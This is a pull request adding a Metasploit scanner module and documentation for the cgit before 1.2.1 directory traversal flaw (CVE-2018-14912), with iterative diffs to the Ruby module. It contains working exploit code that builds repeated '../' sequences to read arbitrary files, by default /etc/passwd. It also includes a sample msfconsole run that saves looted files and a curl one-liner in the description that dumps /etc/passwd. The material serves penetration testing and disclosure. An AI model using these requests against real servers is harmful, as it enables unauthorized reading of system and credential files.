### PR TITLE
cgit < 1.2.1  Directory Traversal

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/cgit_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/cgit_traversal.md
@@ -1,0 +1,73 @@
+## Description
+
+cgit before v1.2.1 has a directory traversal vulnerabiltiy when `cgitrc` has the `enable-http-clone` value set to 1. The directory traversal can be used to download files from the remote host. This module has been tested against cgit v1.1 running on Ubuntu 18.04.
+
+## Vulnerable Application
+
+[cgit before v1.2.1](https://git.zx2c4.com/cgit/)
+
+### Vulnerability Details from Project Zero
+
+There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
+
+```
+void cgit_clone_objects(void)
+{
+    if (!ctx.qry.path) {
+        cgit_print_error_page(400, "Bad request", "Bad request");
+        return;
+    }
+
+    if (!strcmp(ctx.qry.path, "info/packs")) {
+        print_pack_info();
+        return;
+    }
+
+    send_file(git_path("objects/%s", ctx.qry.path));
+}
+```
+
+send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
+git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
+
+ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring.
+
+## Options
+
+**REPO**
+
+Git repository on the remote server
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `set rhosts <rhost>`
+3. `set targeturi <uri>`
+4. `set repo <repo>`
+5. `run`
+
+## Scenarios
+
+### Ubuntu 18.04 x64, cgit | 1.1+git2.10.2-3build1
+
+```
+msf5 > use auxiliary/scanner/http/cgit_traversal
+msf5 auxiliary(scanner/http/cgit_traversal) > set rhosts 172.22.222.123
+rhosts => 172.22.222.123
+msf5 auxiliary(scanner/http/cgit_traversal) > set targeturi /mygit/
+targeturi => /mygit/
+msf5 auxiliary(scanner/http/cgit_traversal) > set repo test
+repo => test
+msf5 auxiliary(scanner/http/cgit_traversal) > set filepath /home/msfdev/proof.txt
+filepath => /home/msfdev/proof.txt
+msf5 auxiliary(scanner/http/cgit_traversal) > set verbose true
+verbose => true
+msf5 auxiliary(scanner/http/cgit_traversal) > run
+
+[+] 172.22.222.123:80     - 
+you found me!
+
+[+] File saved in: /home/msfdev/.msf4/loot/20180813150517_default_172.22.222.123_cgit.traversal_235024.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/cgit_traversal.rb
+++ b/modules/auxiliary/scanner/http/cgit_traversal.rb
@@ -10,10 +10,10 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Directory traversal in cgit',
+      'Name'        => 'cgit Directory Traversal',
       'Description' => %q{
         This module exploits a directory traversal vulnerability which
-        exits in cgit < 1.2.1 cgit_clone_objects(), reachable when the
+        exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the
         configuration flag enable-http-clone is set to 1 (default)
       },
       'References'  =>
@@ -31,11 +31,11 @@ class MetasploitModule < Msf::Auxiliary
       'License'     => MSF_LICENSE
     ))
 
-  register_options(
+    register_options(
       [
         Opt::RPORT(80),
         OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
-        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 6 ])
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])
       ])
   end
 
@@ -45,13 +45,16 @@ class MetasploitModule < Msf::Auxiliary
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => "/cgit/cgit.cgi/git/objects/?path=#{traversal}"
+      'uri'    => '/cgit/cgit.cgi/git/objects/?path='
+      'vars_get' => {
+        'UID' => traversal
+      }
     })
 
     unless res && res.code == 200
       print_error('Nothing was downloaded')
       return
-   end
+    end
 
     vprint_good("#{peer} - #{res.body}")
     path = store_loot(

--- a/modules/auxiliary/scanner/http/cgit_traversal.rb
+++ b/modules/auxiliary/scanner/http/cgit_traversal.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => '/cgit/cgit.cgi/git/objects/?path='
+      'uri'    => '/cgit/cgit.cgi/git/objects/?path=',
       'vars_get' => {
         'UID' => traversal
       }

--- a/modules/auxiliary/scanner/http/cgit_traversal.rb
+++ b/modules/auxiliary/scanner/http/cgit_traversal.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Directory traversal in cgit',
+      'Description' => %q{
+        This module exploits a directory traversal vulnerability which
+        exits in cgit < 1.2.1 cgit_clone_objects(), reachable when the
+        configuration flag enable-http-clone is set to 1 (default)
+      },
+      'References'  =>
+        [
+          ['CVE', '2018-14912'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],
+          ['EDB', '45148']
+        ],
+      'Author'      =>
+        [
+          'Google Project Zero', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => 'Aug 03 2018',
+      'License'     => MSF_LICENSE
+    ))
+
+  register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 6 ])
+      ])
+  end
+
+   def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "../" * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/cgit/cgit.cgi/git/objects/?path=#{traversal}"
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+   end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'cgit.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end


### PR DESCRIPTION
## Summary
This module exploits a  directory traversal vulnerability in `cgit_clone_objects()`, reachable when the configuration flag enable-http-clone is set to 1 (default)

```
void cgit_clone_objects(void)
{
    if (!ctx.qry.path) {
        cgit_print_error_page(400, "Bad request", "Bad request");
        return;
    }
 
    if (!strcmp(ctx.qry.path, "info/packs")) {
        print_pack_info();
        return;
    }
 
    send_file(git_path("objects/%s", ctx.qry.path));
}
 
```
`send_file()` is a function that simply sends the data stored at the given filesystem path out over the network. `git_path()` partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal. `ctx.qry.path` can come from querystring_cb(), which takes unescaped data from the querystring.

## Exploit
```
$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
```
I have not tested this yet, but looking above how this is triggered the module should work perfect, thoughts anyone ?

Reference: https://www.exploit-db.com/exploits/45148/